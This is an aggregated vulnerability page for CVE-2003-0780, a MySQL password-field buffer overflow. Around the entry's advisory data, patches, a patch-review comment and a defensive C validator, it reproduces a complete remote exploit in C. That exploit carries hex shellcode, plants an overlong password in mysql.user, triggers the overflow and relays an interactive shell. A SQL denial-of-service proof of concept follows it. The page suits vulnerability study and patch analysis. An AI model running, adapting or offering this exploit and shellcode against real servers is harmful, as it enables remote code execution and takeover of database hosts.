CVE-2003-0780
CVSS 9.0
Published: 2003-09-22 00:00:00
Revised: 2016-10-17 22:37:23

[Original] Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.


[CNNVD] MySQL Long Password Field Buffer Overflow Vulnerability (CNNVD-200309-035)

        
        MySQL is an open-source relational database system.
        A function involved in password checking in MySQL lacks proper buffer bounds checking. A local or remote attacker can exploit this flaw to mount a buffer overflow attack against MySQL, causing a denial of service or executing arbitrary instructions on the system with the privileges of the MySQL process.
        MySQL user passwords are stored in the "User" table of the "mysql" database; the password field holds the hashed password as a 16-character hexadecimal string. However, the function involved in password checking does not perform proper bounds checking, so if the "Password" field in use is longer than 16 characters, a buffer overflow can occur.
        The get_salt_from_password() function defined in sql/password.c accepts a HEX password of arbitrary length and returns an array value of arbitrary length; when these password hashes are passed to sql/sql_acl.cc for processing, no proper buffer check is performed, and a buffer overflow can be triggered in the acl_init() function.
        

- CVSS (base score)

CVSS score: 9 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: NETWORK [the attacker does not need internal-network or local access]
Authentication: SINGLE_INSTANCE [--]

- CPE (affected platforms and products)

cpe:/a:mysql:mysql:3.23.48    MySQL MySQL 3.23.48
cpe:/a:mysql:mysql:3.23.49    MySQL MySQL 3.23.49
cpe:/a:mysql:mysql:3.23.46    MySQL MySQL 3.23.46
cpe:/a:mysql:mysql:3.23.47    MySQL MySQL 3.23.47
cpe:/a:mysql:mysql:4.1.0:alpha    MySQL MySQL 4.1.0 alpha
cpe:/a:mysql:mysql:3.23.30    MySQL MySQL 3.23.30
cpe:/a:mysql:mysql:3.23.54a    MySQL MySQL 3.23.54a
cpe:/a:mysql:mysql:3.23.44    MySQL MySQL 3.23.44
cpe:/a:mysql:mysql:3.23.45    MySQL MySQL 3.23.45
cpe:/a:mysql:mysql:3.23.42    MySQL MySQL 3.23.42
cpe:/a:mysql:mysql:4.0.7:gamma    MySQL MySQL 4.0.7 gamma
cpe:/a:mysql:mysql:3.23.43    MySQL MySQL 3.23.43
cpe:/a:mysql:mysql:3.23    MySQL MySQL 3.23
cpe:/a:mysql:mysql:4.0.1    MySQL MySQL 4.0.1
cpe:/a:mysql:mysql:4.0.0    MySQL MySQL 4.0.0
cpe:/a:mysql:mysql:3.23.9    MySQL MySQL 3.23.9
cpe:/a:mysql:mysql:4.0.3    MySQL MySQL 4.0.3
cpe:/a:mysql:mysql:3.23.8    MySQL MySQL 3.23.8
cpe:/a:mysql:mysql:4.0.2    MySQL MySQL 4.0.2
cpe:/a:mysql:mysql:3.23.40    MySQL MySQL 3.23.40
cpe:/a:mysql:mysql:4.0.12    MySQL MySQL 4.0.12
cpe:/o:conectiva:linux:9.0    Conectiva Linux 9.0
cpe:/a:mysql:mysql:3.23.41    MySQL MySQL 3.23.41
cpe:/a:mysql:mysql:4.0.11    MySQL MySQL 4.0.11
cpe:/a:mysql:mysql:4.0.14    MySQL MySQL 4.0.14
cpe:/a:mysql:mysql:4.0.13    MySQL MySQL 4.0.13
cpe:/a:mysql:mysql:3.23.3    MySQL MySQL 3.23.3
cpe:/a:mysql:mysql:3.23.55    MySQL MySQL 3.23.55
cpe:/a:mysql:mysql:3.23.2    MySQL MySQL 3.23.2
cpe:/a:mysql:mysql:3.23.56    MySQL MySQL 3.23.56
cpe:/a:mysql:mysql:3.23.5    MySQL MySQL 3.23.5
cpe:/a:mysql:mysql:3.23.53    MySQL MySQL 3.23.53
cpe:/a:mysql:mysql:4.0.10    MySQL MySQL 4.0.10
cpe:/o:conectiva:linux:7.0    Conectiva Conectiva Linux 7.0
cpe:/a:mysql:mysql:3.23.10    MySQL MySQL 3.23.10
cpe:/a:mysql:mysql:3.23.4    MySQL MySQL 3.23.4
cpe:/a:mysql:mysql:3.23.54    MySQL MySQL 3.23.54
cpe:/a:mysql:mysql:4.0.9:gamma    MySQL MySQL 4.0.9 gamma
cpe:/a:mysql:mysql:4.0.8:gamma    MySQL MySQL 4.0.8 gamma
cpe:/a:mysql:mysql:3.23.26    MySQL MySQL 3.23.26
cpe:/a:mysql:mysql:3.23.27    MySQL MySQL 3.23.27
cpe:/a:mysql:mysql:3.23.24    MySQL MySQL 3.23.24
cpe:/a:mysql:mysql:3.23.25    MySQL MySQL 3.23.25
cpe:/a:mysql:mysql:3.23.28    MySQL MySQL 3.23.28
cpe:/a:mysql:mysql:3.23.29    MySQL MySQL 3.23.29
cpe:/a:mysql:mysql:3.23.51    MySQL MySQL 3.23.51
cpe:/a:mysql:mysql:3.23.52    MySQL MySQL 3.23.52
cpe:/a:mysql:mysql:3.23.50    MySQL MySQL 3.23.50
cpe:/a:mysql:mysql:3.23.22    MySQL MySQL 3.23.22
cpe:/a:mysql:mysql:3.23.23    MySQL MySQL 3.23.23
cpe:/a:mysql:mysql:3.23.28:gamma    MySQL MySQL 3.23.28 gamma
cpe:/a:mysql:mysql:4.0.5    MySQL MySQL 4.0.5
cpe:/a:mysql:mysql:4.0.4    MySQL MySQL 4.0.4
cpe:/a:mysql:mysql:4.0.5a    MySQL MySQL 4.0.5a
cpe:/a:mysql:mysql:4.0.7    MySQL MySQL 4.0.7
cpe:/a:mysql:mysql:4.0.6    MySQL MySQL 4.0.6
cpe:/a:mysql:mysql:3.23.37    MySQL MySQL 3.23.37
cpe:/a:mysql:mysql:3.23.38    MySQL MySQL 3.23.38
cpe:/a:mysql:mysql:3.23.36    MySQL MySQL 3.23.36
cpe:/a:mysql:mysql:3.23.39    MySQL MySQL 3.23.39
cpe:/o:conectiva:linux:8.0    Conectiva Conectiva Linux 8.0
cpe:/a:mysql:mysql:3.23.53a    MySQL MySQL 3.23.53a
cpe:/a:mysql:mysql:3.23.33    MySQL MySQL 3.23.33
cpe:/a:mysql:mysql:3.23.34    MySQL MySQL 3.23.34
cpe:/a:mysql:mysql:3.23.31    MySQL MySQL 3.23.31
cpe:/a:mysql:mysql:3.23.32    MySQL MySQL 3.23.32
cpe:/a:mysql:mysql:4.0.11:gamma    MySQL MySQL 4.0.11 gamma
cpe:/a:mysql:mysql:4.0.9    MySQL MySQL 4.0.9
cpe:/a:mysql:mysql:4.0.8    MySQL MySQL 4.0.8
cpe:/a:mysql:mysql:4.1.0.0    MySQL MySQL 4.1.0.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0780
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0780
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200309-035
(official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000743
(UNKNOWN)  CONECTIVA  CLA-2003:743
http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009819.html
(UNKNOWN)  FULLDISC  20030910 Buffer overflow in MySQL
http://marc.info/?l=bugtraq&m=106364207129993&w=2
(UNKNOWN)  BUGTRAQ  20030913 exploit for mysql -- [get_salt_from_password] problem
http://marc.info/?l=bugtraq&m=106381424420775&w=2
(UNKNOWN)  TRUSTIX  2003-0034
http://www.debian.org/security/2003/dsa-381
(VENDOR_ADVISORY)  DEBIAN  DSA-381
http://www.kb.cert.org/vuls/id/516492
(UNKNOWN)  CERT-VN  VU#516492
http://www.mandriva.com/security/advisories?name=MDKSA-2003:094
(UNKNOWN)  MANDRAKE  MDKSA-2003:094
http://www.redhat.com/support/errata/RHSA-2003-281.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:281
http://www.redhat.com/support/errata/RHSA-2003-282.html
(UNKNOWN)  REDHAT  RHSA-2003:282
http://www.securityfocus.com/archive/1/337012
(VENDOR_ADVISORY)  BUGTRAQ  20030910 Buffer overflow in MySQL

- Vulnerability information

MySQL Long Password Field Buffer Overflow Vulnerability
High severity  Boundary condition error
2003-09-22 00:00:00 2007-05-30 00:00:00
Remote
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade right away, CNNVD recommends the following measures to reduce the threat:
        * Third-party patch for MySQL 4.0.14:
        --- mysql-4.0.14-old/sql/sql_acl.cc 2003-07-18 16:57:25.000000000 +0200
        +++ mysql-4.0.14/sql/sql_acl.cc 2003-09-10 23:21:13.559759576 +0200
         -233,7 +233,7
         "Found old style password for user ''. Ignoring user. (You may want to restart mysqld using --old-protocol)",
         user.user ? user.user : ""); /* purecov: tested */
         }
        - else if (length % 8) // This holds true for passwords
        + else if (length % 8 || length > 16) // This holds true for passwords
         {
         sql_print_error(
         "Found invalid password for user: ''; Ignoring user",
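Review bot: the added `length > 16` test on the `else if` line closes the overflow only at this call site in acl_init(); by the description above, get_salt_from_password() in sql/password.c still decodes one word per 8 hex characters for as long as the input lasts, so any other caller that hands it an unvalidated Password value keeps the same exposure. Suggest also bounding the callee, e.g. passing the size of the salt array (two words) and stopping when it is full, so the invariant does not depend on every caller repeating this check. Note too that this copy of the hunk has lost its `@@` markers and the `%s` placeholders in both error messages (they appear as empty `''` while the `user.user ? user.user : ""` argument is still passed), so the patch should be taken from the original post rather than applied from this rendering.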
        Vendor patch:
        MySQL AB
        --------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's homepage and upgrade to MySQL 4.0.15:
        
        http://www.mysql.com/downloads/mysql-4.0.html
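As an added example (written for this page, not code from MySQL AB or from the author of the third-party patch), the following C program reproduces the bounds logic that the description above and the patch rely on: a salt decoder that knows the capacity of its output array, an acceptance test equivalent to the patched `length % 8 || length > 16` branch, and an audit helper that counts over-long Password fields in a constructed sample of mysql.user values. The 16-character hash length, the two-word salt and the patched condition come from the page; the function names, the `PW_OLD_STYLE` modelling of the 8-character case, the rejection of non-hex digits and the sample values are assumptions made for this example.

```c
/* Added example, not MySQL source: the bounds logic behind the
 * CVE-2003-0780 fix as a stand-alone validator. An old-style MySQL hash is
 * 16 hex characters, decoded 8 at a time into user.salt[2]. The unpatched
 * get_salt_from_password() decoded for as long as the string lasted, so a
 * longer Password field wrote past the salt. Here the decoder knows its
 * output capacity and the caller applies the patched acceptance test. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define SALT_WORDS       2                            /* size of user.salt */
#define HEX_PER_WORD     8
#define MAX_PASSWORD_HEX (SALT_WORDS * HEX_PER_WORD)  /* 16 */

enum pw_status { PW_OK = 0, PW_OLD_STYLE = 1, PW_INVALID = 2 };

/* Constructed sample Password fields standing in for a dump of mysql.user. */
const char *const SAMPLE_PASSWORDS[] = {
    "1234abcd5678ef90",                          /* normal 16-hex hash */
    "",                                          /* account without password */
    "12345678",                                  /* pre-3.23 old-style hash */
    "1234567812345678123456781234567812345678",  /* 40 chars: would overflow */
};
#define SAMPLE_N (sizeof SAMPLE_PASSWORDS / sizeof SAMPLE_PASSWORDS[0])

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Same acceptance test as the patched acl_init() branch: 8 characters is
 * the old format (ignored unless --old-protocol; modelled as PW_OLD_STYLE),
 * a length that is not a multiple of 8 or exceeds 16 is invalid, and an
 * empty field means "no password" (zero salt). Non-hex digits are also
 * rejected here, which the original did not check (added assumption). */
enum pw_status classify_password_field(const char *pw)
{
    size_t len = pw ? strlen(pw) : 0;
    if (len == 0) return PW_OK;
    if (len == 8) return PW_OLD_STYLE;
    if (len % HEX_PER_WORD || len > MAX_PASSWORD_HEX) return PW_INVALID;
    for (size_t i = 0; i < len; i++)
        if (hexval(pw[i]) < 0) return PW_INVALID;
    return PW_OK;
}

/* Bounded decoder: writes at most `cap` words, returns the number written
 * or -1 when the string needs more room than the caller has. */
int get_salt_bounded(uint32_t *res, size_t cap, const char *pw)
{
    size_t len = pw ? strlen(pw) : 0, words = len / HEX_PER_WORD;
    memset(res, 0, cap * sizeof *res);
    if (len % HEX_PER_WORD || words > cap) return -1;
    for (size_t w = 0; w < words; w++) {
        uint32_t val = 0;
        for (int i = 0; i < HEX_PER_WORD; i++) {
            int d = hexval(pw[w * HEX_PER_WORD + i]);
            if (d < 0) return -1;
            val = (val << 4) | (uint32_t)d;
        }
        res[w] = val;
    }
    return (int)words;
}

/* The idx-th decoded salt word of a field, or -1 if the field is rejected. */
long long salt_word_of(const char *pw, size_t idx)
{
    uint32_t salt[SALT_WORDS];
    if (idx >= SALT_WORDS || get_salt_bounded(salt, SALT_WORDS, pw) < 0)
        return -1;
    return salt[idx];
}

/* Audit helper: how many fields in a dump would an unpatched acl_init()
 * have handed to the unbounded decoder (longer than 16 characters)? */
int count_overlong_passwords(const char *const *fields, size_t n)
{
    int bad = 0;
    for (size_t i = 0; i < n; i++)
        if (fields[i] && strlen(fields[i]) > MAX_PASSWORD_HEX) bad++;
    return bad;
}

int main(void)
{
    for (size_t i = 0; i < SAMPLE_N; i++) {
        enum pw_status st = classify_password_field(SAMPLE_PASSWORDS[i]);
        printf("len=%2zu status=%d word0=%lld\n", strlen(SAMPLE_PASSWORDS[i]),
               (int)st, st == PW_OK ? salt_word_of(SAMPLE_PASSWORDS[i], 0) : -1LL);
    }
    printf("over-long Password fields: %d\n",
           count_overlong_passwords(SAMPLE_PASSWORDS, SAMPLE_N));
    return 0;
}
```

The design point is that the capacity travels with the output buffer: `get_salt_bounded()` cannot write more than `cap` words whatever the caller did or did not check beforehand, which is the property the third-party patch only establishes at one call site. The audit helper is the same check a DBA could run over a dump of the mysql.user table on an old server to find rows that would trip the unpatched decoder.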

- Vulnerability information (98)

MySQL 3.23.x/4.0.x Remote Exploit (EDBID:98)
Platform: linux   Type: remote
Date: 2003-09-14   Verified
Port: 3306   Author: bkbll
/* Mysql 3.23.x/4.0.x remote exploit
* proof of concept
* using jmp *eax
* bkbll (bkbll cnhonker.net,bkbll tom.com) 2003/09/12
* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
* DO NOT DISTRIBUTE IT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>        /* memset, memcpy, strlen */
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>
#include <netinet/in.h>    /* struct sockaddr_in, htons */
#include <netdb.h>
#include <mysql/mysql.h>

#define PAD 19*4*2
#define JMPADDR 0x42125b2b
#define ROOTUSER "root"
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root' OR user='root LIMIT 1,1'"
#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"
#define BUF 1024

MYSQL *conn;
char NOP[]="90";
/*
char shellcode[]=
"31c031db31c9b002"
"cd8085c0751b4b31"
"d2b007cd8031c0b0"
"40cd8089c331c9b1"
"09b025cd80b001cd"
"80b017cd8031c050"
"405089e331c9b0a2"
"cd80b1e089c883e8"
"0af7d04089c731c0"
"404c89e250505257"
"518d4c240431dbb3"
"0ab066cd805983f8"
"017505803a497409"
"e2d231c04089c3cd"
"8089fbb103b03f49"
"cd8041e2f851686e"
"2f7368682f2f6269"
"89e351682d696c70"
"89e251525389e131"
"d231c0b00bcd8090";
*/
char shellcode[]=
"db31c03102b0c931"
"c08580cd314b1b74"
"cd07b0d2b0c03180"
"8980cd40b1c931c3"
"cd25b009cd01b080"
"cd17b08050c03180"
"e3895040a2b0c931"
"e0b180cde883c889"
"40d0f70ac031c789"
"e2894c4057525050"
"244c8d51b3db3104"
"cd66b00af8835980"
"800575010974493a"
"c031d2e2cdc38940"
"b1fb8980493fb003"
"e24180cd6e6851f8"
"6868732f69622f2f"
"6851e389706c692d"
"5251e28931e18953"
"b0c031d29080cd0b";

int type=1;
struct
{
 char *os;
 u_long ret;
} targets[] =
     {
          { "glibc-2.2.93-5", 0x42125b2b },
    },v;

void usage(char *);
void sqlerror(char *);
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);

int main(int argc,char **argv)
{
    MYSQL_RES *result;
    MYSQL_ROW row;
    char jmpaddress[9];   /* 8 hex digits plus the terminator written below */
    char buffer[BUF],muser[20],buf2[800];
    my_ulonglong rslines;
    struct sockaddr_in clisocket;
    int i=0,j,clifd,count,a;
    char data1,c;
    fd_set fds;
    char *server=NULL,*rootpass=NULL;

    if(argc<3) usage(argv[0]);
    while((c = getopt(argc, argv, "d:t:p:"))!= EOF)
      {
            switch (c)
            {
              case 'd':
                  server=optarg;
                  break;
              case 't':
                  type = atoi(optarg);
                  if((type > sizeof(targets)/sizeof(v)) || (type < 1))
                       usage(argv[0]);
                  break;
             case 'p':
                  rootpass=optarg;
                   break;
             default:
                  usage(argv[0]);
                  return 1;
              }
          }
          if(server==NULL || rootpass==NULL)
              usage(argv[0]);
    memset(muser,0,20);
    memset(buf2,0,800);
    printf("@-------------------------------------------------@\n");
    printf("#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #\n");
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("---------------------------------------------------\n");
    printf("[+] Connecting to mysql server %s:%d....",server,PORT);
    fflush(stdout);
    conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);
    if(conn==NULL) exit(0);
    printf("ok\n");
    printf("[+] ALTER user column...");
    fflush(stdout);
    if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)
        sqlerror("ALTER user table failed");
    //select
    printf("ok\n");
    printf("[+] Select a valid user...");
    fflush(stdout);
    if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0) 
        sqlerror("select user from table failed");
    printf("ok\n");
    result=mysql_store_result(conn);
    if(result==NULL)
        sqlerror("store result error");
    rslines=mysql_num_rows(result);
    if(rslines==0)
        sqlerror("store result error");
    row=mysql_fetch_row(result);
    snprintf(muser,19,"%s",row[0]);
    printf("[+] Found a user:%s\n",muser);
    memset(buffer,0,BUF);
    i=sprintf(buffer,"update user set password='");
    sprintf(jmpaddress,"%x",JMPADDR);
    jmpaddress[8]=0;
    for(j=0;j<PAD-4;j+=2)
    {
        memcpy(buf2+j,NOP,2);
    }
    memcpy(buf2+j,"06eb",4);
    memcpy(buf2+PAD,jmpaddress,8);
    memcpy(buf2+PAD+8,shellcode,strlen(shellcode));
    j=strlen(buf2);
    if(j%8)
    {
        j=j/8+1;
        count=j*8-strlen(buf2);
        memset(buf2+strlen(buf2),'A',count);
    }
    printf("[+] Password length:%d\n",strlen(buf2));
    memcpy(buffer+i,buf2,strlen(buf2));
    i+=strlen(buf2);
    i+=sprintf(buffer+i,"' where user='%s'",muser);
    mysql_free_result(result);
    printf("[+] Modified password...");
    fflush(stdout);    
    //get result
    //write(2,buffer,i);
    if(mysql_real_query(conn,buffer,i)!=0) 
        sqlerror("Modified password error");
    //here I'll find client socket fd
    printf("ok\n");
    printf("[+] Finding client socket......");
    socklen_t slen=sizeof(clisocket);
    for(clifd=3;clifd<256;clifd++)
    {
        if(getpeername(clifd,(struct sockaddr *)&clisocket,&slen)==-1) continue;
        if(clisocket.sin_port==htons(PORT)) break;
    }
    if(clifd==256)
    {
        printf("FAILED\n[-] Cannot find client socket\n");
        mysql_close(conn);
        exit(0);
    }
    data1='I';
    printf("ok\n");
    printf("[+] socketfd:%d\n",clifd);
    //let server overflow
    printf("[+] Overflow server....");
    fflush(stdout);
    send(clifd,FLUSHSQL,sizeof(FLUSHSQL),0);
    //if(mysql_real_query(conn,FLUSHSQL,strlen(FLUSHSQL))!=0) 
    //    sqlerror("Flush error");
    printf("ok\n");
      printf("[+] sending OOB.......");
      fflush(stdout);
      if(send(clifd,&data1,1,MSG_OOB)<1)
      {
          perror("error");
          mysql_close(conn);
          exit(0);
      }
    printf("ok\r\n");
    printf("[+] Waiting a shell.....");
    fflush(stdout);
    j=0;
    memset(buffer,0,BUF);
      while(1)
    {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(clifd, &fds);
        
        if (select(clifd+1, &fds, NULL, NULL, NULL) < 0) 
        {
            if (errno == EINTR) continue;
            break;
        }
        if (FD_ISSET(0, &fds)) 
        {
            count = read(0, buffer, BUF);
            if (count <= 0) break;
            if (write(clifd, buffer, count) <= 0) break;
            memset(buffer,0,BUF);
        }
        if (FD_ISSET(clifd, &fds)) 
        {
            count = read(clifd, buffer, BUF);
            if (count <= 0) break;
            if(j==0) printf("Ok\n");
            j=1;
            if (write(1, buffer, count) <= 0) break;
            memset(buffer,0,BUF);
        }
        
    }    
    return 0;
}

void usage(char *s)
{
    int a;
    printf("@-------------------------------------------------@\n");
    printf("#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #\n");
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("---------------------------------------------------\n");
    printf("Usage:%s -d <host> -p <root_pass> -t <type>\n",s);
    printf("      -d target host ip/name\n");
    printf("      -p 'root' user paasword\n");
    printf("      -t  type [default:%d]\n",type);
    printf("      ------------------------------\n");
    for(a = 0; a < sizeof(targets)/sizeof(v); a++)
        printf("         %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);   
    printf("\n");           
    exit(0);
}
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)
{
    MYSQL *connect;
    connect=mysql_init(NULL);
    if(connect==NULL)
    {
        printf("FAILED\n[-] init mysql failed:%s\n",mysql_error(connect));
        return NULL;
    }
    if(mysql_real_connect(connect,server,user,pass,dbname,port,NULL,0)==NULL)
    {
           printf("FAILED\n[-] Error: %s\n",mysql_error(connect));
           return NULL;
       }
       return connect;

}
void sqlerror(char *s)
{
    fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));
    mysql_close(conn);
    exit(0);
}

// milw0rm.com [2003-09-14]
		

- Vulnerability information (23138)

MySQL 3.23.x/4.0.x Password Handler Buffer Overflow Vulnerability (EDBID:23138)
Platform: linux   Type: dos
Date: 2003-09-10   Verified
Port: 0   Author: Frank DENIS
source: http://www.securityfocus.com/bid/8590/info

MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size.

The issue presents itself due to a lack of sufficient bounds checking when processing MySQL user passwords. A password greater than 16 characters may overrun the bounds of a reserved buffer in memory and corrupt adjacent memory. An attacker with global administrative privileges on an affected MySQL server may potentially exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server.

> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
'123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678...' WHERE User = 'abcd';
> FLUSH PRIVILEGES;

[Connection lost]

mysqld_safe/safe_mysqld log :
		

- Vulnerability information

2537
MySQL sql_acl.cc get_salt_from_password Function Password Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

A remote buffer overflow exists in MySQL. MySQL fails to validate the length of the user-supplied password in the MySQL user table. If an authenticated attacker with the "alter database" privilege alters any user's password to a value longer than 16 characters, a buffer overflow occurs. With a specially crafted request, an attacker can cause the execution of arbitrary code, resulting in a loss of integrity.

- Timeline

2003-09-11 Unknown
2003-09-11 Unknown

- Solution

Upgrade to version 4.0.15 or higher, as it has been reported to fix this vulnerability. It is also possible to correct this flaw by implementing the following workaround(s): Do not grant untrusted users the "alter database" privilege (a privilege normally granted only to root by default). Do not allow untrusted users to connect to MySQL directly (usually on port 3306/tcp).


- Vulnerability information

MySQL Password Handler Buffer Overflow Vulnerability
Boundary Condition Error 8590
Yes No
2003-09-10 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Frank Denis <j@pureftpd.org>.

- Affected program versions

SGI ProPack 2.3
SGI ProPack 2.2.1
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1
MySQL AB MySQL 4.0.14
+ OpenPKG OpenPKG 1.3
+ OpenPKG OpenPKG Current
+ Trustix Secure Linux 2.0
MySQL AB MySQL 4.0.13
MySQL AB MySQL 4.0.12
MySQL AB MySQL 4.0.11 -gamma
MySQL AB MySQL 4.0.11
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
MySQL AB MySQL 4.0.10
MySQL AB MySQL 4.0.9 -gamma
MySQL AB MySQL 4.0.9
MySQL AB MySQL 4.0.8 -gamma
MySQL AB MySQL 4.0.8
MySQL AB MySQL 4.0.7 -gamma
MySQL AB MySQL 4.0.7
MySQL AB MySQL 4.0.6
MySQL AB MySQL 4.0.5 a
MySQL AB MySQL 4.0.5
MySQL AB MySQL 4.0.4
MySQL AB MySQL 4.0.3
MySQL AB MySQL 4.0.2
MySQL AB MySQL 4.0.1
MySQL AB MySQL 4.0 .0
MySQL AB MySQL 3.23.58
+ Conectiva Linux 9.0
+ Red Hat Enterprise Linux AS 2.1
+ Red Hat Fedora Core2
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
+ Sun Linux 5.0.7
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Workstation 8.0
MySQL AB MySQL 3.23.56
MySQL AB MySQL 3.23.55
+ OpenPKG OpenPKG Current
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.54 a
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG Current
+ RedHat Linux 9.0 i386
MySQL AB MySQL 3.23.54
+ Sun Cobalt RaQ 550
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.53 a
MySQL AB MySQL 3.23.53
+ OpenPKG OpenPKG Current
+ Sun Cobalt Qube 3
MySQL AB MySQL 3.23.52
+ Conectiva Linux Enterprise Edition 1.0
+ Mandriva Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.51
MySQL AB MySQL 3.23.50
MySQL AB MySQL 3.23.49
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
MySQL AB MySQL 3.23.48
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
MySQL AB MySQL 3.23.47
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
MySQL AB MySQL 3.23.46
+ Conectiva Linux 8.0
+ OpenPKG OpenPKG 1.0
MySQL AB MySQL 3.23.45
MySQL AB MySQL 3.23.44
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
MySQL AB MySQL 3.23.43
MySQL AB MySQL 3.23.42
MySQL AB MySQL 3.23.41
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2
MySQL AB MySQL 3.23.40
MySQL AB MySQL 3.23.39
+ HP SCM 3.0
MySQL AB MySQL 3.23.38
MySQL AB MySQL 3.23.37
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
MySQL AB MySQL 3.23.36
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ EnGarde Secure Linux 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
MySQL AB MySQL 3.23.34
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 5.2 sparc
